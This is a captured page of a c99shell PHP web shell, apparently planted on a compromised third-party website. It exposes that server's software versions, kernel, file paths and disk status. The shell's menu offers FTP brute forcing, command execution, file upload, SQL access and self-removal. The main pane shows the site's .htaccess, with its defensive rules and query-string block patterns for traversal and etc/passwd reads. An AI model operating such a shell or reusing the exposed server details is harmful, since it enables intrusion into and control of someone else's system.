itce.co.in - c99shell

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!
Software: nginx/1.24.0. PHP/7.3.32 uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 22:31:59 UTC 2025 x86_64 Safe-mode: OFF (not secure) /www/wwwroot/itce.co.in/itce.co.in/ drwxr-xr-x Free 30.76 GB of 49.93 GB (61.62%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/itce.co.in/ drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: .htaccess (2.13 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

# ----------------------------------------
# 🔒 SECURITY: Protect Website from Hackers
# ----------------------------------------

# Disable directory browsing
Options -Indexes

# Prevent viewing of .htaccess itself
<Files .htaccess>
  Order allow,deny
  Deny from all
</Files>

# Protect configuration and system files
<FilesMatch "(^#.*#|\.(bak|config|sql|fla|psd|ini|log|sh|inc|swp|dist|env|json|lock|gitignore|git|yml|yaml))$">
  Order allow,deny
  Deny from all
</FilesMatch>

# Block access to hidden files and directories (e.g., .git, .env)
RedirectMatch 403 /\..*$

# Prevent PHP execution in uploads folder (change 'uploads' to your folder)
<Directory "/uploads">
  <FilesMatch "\.php$">
    Order allow,deny
    Deny from all
  </FilesMatch>
</Directory>

# Protect wp-config.php or other critical config files (for WordPress or PHP apps)
<Files wp-config.php>
  Order allow,deny
  Deny from all
</Files>

# Block access to composer files
<FilesMatch "(composer\.json|composer\.lock|package\.json|yarn\.lock)">
  Order allow,deny
  Deny from all
</FilesMatch>

# Disable server signature (hide Apache version info)
ServerSignature Off

# Prevent content-type sniffing
Header always set X-Content-Type-Options "nosniff"

# Prevent XSS attacks
Header always set X-XSS-Protection "1; mode=block"

# Prevent Clickjacking
Header always set X-Frame-Options "SAMEORIGIN"

# Enforce HTTPS (optional — uncomment if you have SSL)
# RewriteEngine On
# RewriteCond %{HTTPS} off
# RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Block suspicious query strings (basic firewall)
RewriteEngine On
RewriteCond %{QUERY_STRING} (\.\./|\.\.\\|boot\.ini|etc/passwd|self/environ) [NC,OR]
RewriteCond %{QUERY_STRING} (GLOBALS|_REQUEST|proc/self|ftp://|https?://|mosConfig) [NC]
RewriteRule ^(.*)$ - [F,L]

# Block access to xmlrpc.php (WordPress users)
<Files xmlrpc.php>
  Order allow,deny
  Deny from all
</Files>

# Disable image hotlinking (optional)
# RewriteCond %{HTTP_REFERER} !^$
# RewriteCond %{HTTP_REFERER} !^https?://(www\.)?yourdomain\.com [NC]
# RewriteRule \.(jpg|jpeg|png|gif)$ - [F]

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.001 ]--